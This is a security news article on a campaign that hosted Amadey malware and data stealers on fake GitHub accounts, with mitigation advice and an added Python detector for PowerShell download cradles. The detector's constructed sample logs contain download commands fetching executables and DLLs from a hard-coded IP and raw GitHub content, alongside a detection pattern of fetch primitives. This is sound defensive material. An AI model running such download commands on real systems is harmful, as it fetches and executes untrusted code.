Hackers Exploit GitHub Repositories to Distribute Amadey Malware and Data Stealers

In April 2025, cybersecurity researchers identified a sophisticated campaign where threat actors utilized public GitHub repositories to host and distribute malicious payloads, notably the Amadey malware. This strategy appears to be an attempt to circumvent web filtering mechanisms and streamline the deployment of malware.

Cisco Talos researchers Chris Neal and Craig Jackson reported that operators of malware-as-a-service (MaaS) platforms created fake GitHub accounts to host various payloads, tools, and Amadey plugins. By leveraging GitHub’s trusted infrastructure, these actors aimed to evade detection and facilitate the distribution of their malicious software.

Attack Chain and Malware Deployment

The attack sequence begins with a malware loader known as Emmenhtal, also referred to as PEAKLIGHT. Emmenhtal is responsible for delivering Amadey, which subsequently downloads additional custom payloads from the malicious GitHub repositories. This method mirrors tactics observed in earlier campaigns, such as a February 2025 phishing operation that used invoice-related lures to distribute SmokeLoader via Emmenhtal, particularly targeting Ukrainian entities.

Both Emmenhtal and Amadey function as downloaders for secondary payloads like information stealers. However, Amadey distinguishes itself by its ability to collect system information and extend its capabilities through various DLL plugins. These plugins enable functionalities such as credential theft and screenshot capture, enhancing the malware’s versatility.

GitHub as a Malicious Hosting Platform

The April 2025 campaign involved three GitHub accounts—Legendary99999, DFfe9ewf, and Milidmdds—used to host Amadey plugins, secondary payloads, and other malicious scripts, including Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer. These accounts have since been removed by GitHub.

Analysis revealed that some JavaScript files in these repositories were identical to those used in previous Emmenhtal campaigns, with the primary difference being the payloads delivered. Specifically, the Emmenhtal loader files in these repositories served as delivery vectors for Amadey, AsyncRAT, and a legitimate copy of PuTTY.exe.

Additionally, a Python script found in the repositories suggests an evolution of Emmenhtal, incorporating an embedded PowerShell command to download Amadey from a hard-coded IP address. This indicates a continuous adaptation and refinement of attack techniques by the threat actors.

Broader Implications and Related Threats

The use of GitHub for hosting malicious payloads underscores a broader trend where cybercriminals exploit trusted platforms to distribute malware. This tactic not only aids in evading detection but also leverages the credibility of legitimate services to deceive users.

In a related development, Trellix detailed a phishing campaign targeting financial services institutions in Hong Kong, which utilized a malware loader known as SquidLoader. SquidLoader employs advanced anti-analysis, anti-sandbox, and anti-debugging techniques, making it a formidable threat. It establishes communication with a remote server to send information about the infected host and injects the next-stage payload, often culminating in the deployment of a Cobalt Strike beacon for remote access and control.

Recommendations for Mitigation

To protect against such sophisticated threats, organizations and individuals should adopt the following measures:

1. Exercise Caution with External Repositories: Be vigilant when downloading and executing code from public repositories. Verify the authenticity of the source and review the code for any anomalies.

2. Implement Robust Security Solutions: Utilize comprehensive security software that includes behavior-based detection capabilities to identify and mitigate malware that employs evasion techniques.

3. Regularly Update Systems: Ensure that all software and systems are up to date with the latest security patches to minimize vulnerabilities that could be exploited by malware.

4. Educate Users: Provide training on recognizing phishing attempts and the risks associated with downloading and executing code from unverified sources.

5. Monitor Network Activity: Implement network monitoring to detect unusual activities that may indicate a compromise, such as unexpected outbound connections or data exfiltration attempts.
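One way to act on recommendation 5 against the pattern this article describes (a PowerShell download cradle pulling a payload from a hard-coded IP address or from raw GitHub repository content), as an added example that is not code from the original article or from Talos: a small Python scanner over PowerShell script-block log entries that flags download primitives whose source is a literal IP or a GitHub content host. All sample log entries, hosts, users and paths below are constructed, not real campaign indicators.

```python
import re
from ipaddress import ip_address
from typing import Optional
from urllib.parse import urlparse

# PowerShell primitives commonly used to fetch a remote file or script.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
    r"DownloadFile|Net\.WebClient|Start-BitsTransfer|curl|wget)\b")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"<>)]+")


def classify_url(url: str) -> Optional[str]:
    """Return why a URL is a suspicious payload source, or None if it is not."""
    host = (urlparse(url).hostname or "").lower()
    try:
        ip_address(host)
        return "literal-ip"            # hard-coded IP instead of a hostname
    except ValueError:
        pass
    if host == "github.com" or host.endswith("githubusercontent.com"):
        return "repo-hosted"           # raw file served from a code repository
    return None


def inspect_script_block(text: str) -> list:
    """Flag download cradles whose source is a literal IP or GitHub raw content."""
    findings = []
    if not DOWNLOAD_PRIMITIVES.search(text):
        return findings                # no fetch primitive: not a cradle
    for url in URL_RE.findall(text):
        reason = classify_url(url)
        if reason:
            findings.append({"url": url, "reason": reason})
    return findings


# Constructed script-block entries (e.g. PowerShell event 4104 text), not real artifacts.
SAMPLE_SCRIPT_BLOCKS = [
    "Invoke-WebRequest -Uri http://203.0.113.10/update.exe -OutFile C:\\ProgramData\\svc.exe",
    "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/"
    "exampleuser/examplerepo/main/plugin.dll', 'C:\\ProgramData\\plugin.dll')",
    "Invoke-RestMethod https://api.example.org/status",          # named API host: not flagged
    "Get-ChildItem C:\\Users | Where-Object {$_.Name -like 'a*'}",  # no download at all
]


def scan(blocks) -> list:
    """Return (block index, finding) pairs for every suspicious download found."""
    return [(i, f) for i, b in enumerate(blocks) for f in inspect_script_block(b)]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {finding['reason']} -> {finding['url']}")
```

Feed it the script-block text from your PowerShell logging pipeline; hits on `literal-ip` or `repo-hosted` sources are worth triage, since legitimate software updates rarely use either.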

By adopting these practices, organizations can enhance their resilience against campaigns that exploit trusted platforms like GitHub to distribute malware.